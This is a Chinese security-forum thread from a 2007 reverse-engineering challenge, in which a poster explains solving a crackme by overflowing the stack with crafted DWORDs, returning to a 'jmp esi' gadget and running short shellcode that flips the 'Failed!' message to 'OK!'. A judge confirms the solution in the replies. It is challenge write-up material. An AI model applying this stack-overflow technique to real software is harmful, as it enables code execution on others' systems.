首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 看雪峰会 看雪商城 证书查询
  1. 看雪社区
  2. 1)珠海金山2007逆向分析挑战赛
    3. 发新帖
[原创]第二阶段第一题
2007-8-28 15:31 7329

[原创]第二阶段第一题

jwh51 活跃值
2007-8-28 15:31
7329
构造前8字节,可以读入13个DWORD,使堆栈溢出,使堆栈返回到4002b8。这里是一个jmp esi,可以jmp到读入的代码区.

004002B8  - FFE6            JMP ESI //jmp bc0000

00BC0000   /EB 7C           JMP SHORT 00BC007E

00BC007E    8BEC            MOV EBP,ESP
00BC0080    83C5 20         ADD EBP,20                  //修正下EBP
00BC0083    B8 60024000     MOV EAX,400260                           ; ASCII "Failed!"
00BC0088    C700 4F4B2100   MOV DWORD PTR [EAX],214B4F
00BC008E    05 27010000     ADD EAX,127
00BC0093    C600 60         MOV BYTE PTR [EAX],60
00BC0096    68 83034000     PUSH 400383
00BC009B    C3              RETN

OK!

[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法

上传的附件:
收藏
点赞0
打赏
分享
最新回复 (7)
笨笨雄
雪    币: 846
活跃值: (221)
能力值: (RANK:570 )
在线值:
发帖
回帖
粉丝
私信
笨笨雄 14 2007-8-28 15:54
2
0
测试通过~~
jwh51
雪    币: 203
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
jwh51 2007-8-28 16:06
3
0
晕,没注意到计分有大小限制。
上传的附件:
jwh51
雪    币: 203
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
jwh51 2007-8-28 16:10
4
0
请重新验收!前面没注意到计分大小相关
笨笨雄
雪    币: 846
活跃值: (221)
能力值: (RANK:570 )
在线值:
发帖
回帖
粉丝
私信
笨笨雄 14 2007-8-28 16:16
5
0
验证通过~~
jwh51
雪    币: 203
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
jwh51 2007-8-28 17:23
6
0
再次把文件缩小了。
上传的附件:
笨笨雄
雪    币: 846
活跃值: (221)
能力值: (RANK:570 )
在线值:
发帖
回帖
粉丝
私信
笨笨雄 14 2007-8-28 17:50
7
0
验证通过~~
笨笨雄
雪    币: 846
活跃值: (221)
能力值: (RANK:570 )
在线值:
发帖
回帖
粉丝
私信
笨笨雄 14 2007-9-2 21:24
8
0
131.33846787056947576100704372719
游客
登录 | 注册 方可回帖
 回帖  表情 雪币赚取及消费
高级回复
返回